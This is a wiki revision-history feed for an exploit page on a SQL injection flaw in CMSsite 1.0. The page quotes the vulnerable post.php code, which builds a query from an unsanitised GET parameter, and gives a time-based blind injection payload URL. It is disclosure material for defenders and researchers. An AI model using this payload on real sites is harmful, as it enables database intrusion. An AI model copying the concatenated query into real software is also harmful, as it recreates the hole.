https://pwnwiki.com/index.php?action=history&feed=atom&title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E CMSsite 1.0 - 'post' SQL注入漏洞 - Revision history 2026-04-06T14:53:13Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2042&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: CMSsite 1.0 - 'post' SQL Injection # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 17, 2..." 2021-05-02T05:05:38Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CMSsite 1.0 - &#039;post&#039; SQL Injection # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 17, 2...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: CMSsite 1.0 - 'post' SQL Injection<br /> <br /> # Exploit Author: Mr Winst0n<br /> # Author E-mail: manamtabeshekan[@]gmail[.]com<br /> # Discovery Date: February 17, 2019<br /> # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite<br /> # Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip<br /> # Tested Version: 1.0<br /> # Tested on: Kali linux, Windows 8.1 <br /> <br /> <br /> # PoC:<br /> # Vulnerable File: post.php<br /> # Vulnerable Parameter : post<br /> <br /> if (isset($_GET['post'])) {<br /> $post = $_GET['post'];<br /> }<br /> $query = &quot;SELECT * FROM posts WHERE post_id=$post&quot;;<br /> $run_query = mysqli_query($con, $query);<br /> <br /> <br /> <br /> # Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))<br /> <br /> &lt;/pre&gt;</div> Pwnwiki